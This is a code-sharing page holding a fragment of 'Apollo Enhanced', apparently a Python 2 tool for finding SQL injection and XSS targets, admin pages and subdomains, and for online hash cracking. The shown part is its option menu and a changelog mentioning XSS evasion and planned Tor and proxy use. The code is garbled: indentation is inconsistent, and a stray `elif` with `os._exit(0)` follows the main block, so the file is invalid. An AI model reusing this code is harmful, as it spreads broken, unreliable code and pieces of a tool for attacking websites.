    option = raw_input('-[!]-  Enter Option: ')
 
    if option:
        if option == '1':
            Crawl()
            output()
            
        elif option == '2':
            Crawl()
            output()
 
        elif option == '3':
            Crawl()
            output()
 
        elif option == '4':
            Crawl()
            output()
 
        elif option == '5':
            admin()
            aprint()

        elif option == '6':
            subd()

        elif option == '7':
            word()

        elif option == '8':
            OnlineCrack().crack()
             
        elif option == '9':
            Check().grab()  

        elif option == '10':
        	print(O+'''\n--- Changes Made in Enhanced Apollo ---''')
		print(G+'''
    = Apollo now scan wider range of SQL DBs
    ---- MySQL [More errors]
    ---- MsSQL [More errors]
    ---- Oracle/JBDC
    ---- ODBC
    ---- OLEDB
    ---- JETDB
    ---- ADODB
    ---- ProgreSQL
    ---- Sybase
    = XSS added evasion
    = Removed paramiko, due to errors
    = Added Color UI
    = Added more admin pages''')
        	print(O+'''\n--- Future Plans ---''')
		print(G+'''
    = Random User Agent [WIP]
    = TOR/Polipo [WIP]
    = SSH tunnelling (better than paramiko)
    = Online Proxy Grabber [WIP]
    = More detail on IP [WIP]
    = SQL Column Counter [WIP]
    = Persistent XSS finder
    = XSS finder with manual options
    = SQLi with manual options''')
	        print(B+'''\n## Contact at [email protected] ##''')
		print W

        else:
            print R+'\nInvalid Choice\n'+W
            time.sleep(0.5)
            main()
 
    else:
        print R+'\nYou Must Enter An Option\n'+W
        time.sleep(0.5)
        main()

if __name__ == '__main__':
    main()
elif conf.get("threads", 0) > 1:
            os._exit(0)

Initial URL
https://github.com/SotdCode

Initial Description
This is a fork of the original project “Apollo” Python Vulnerability Scanner by Sotd. This fork version has majorly enhanced SQL and XSS dorking functions. Please do not rip either mine or Sotd codes, because if you do, KITTENS WILL DIE! Ahem…

Initial Title
Apollo Enhanced

Initial Tags

                                

Initial Language
Python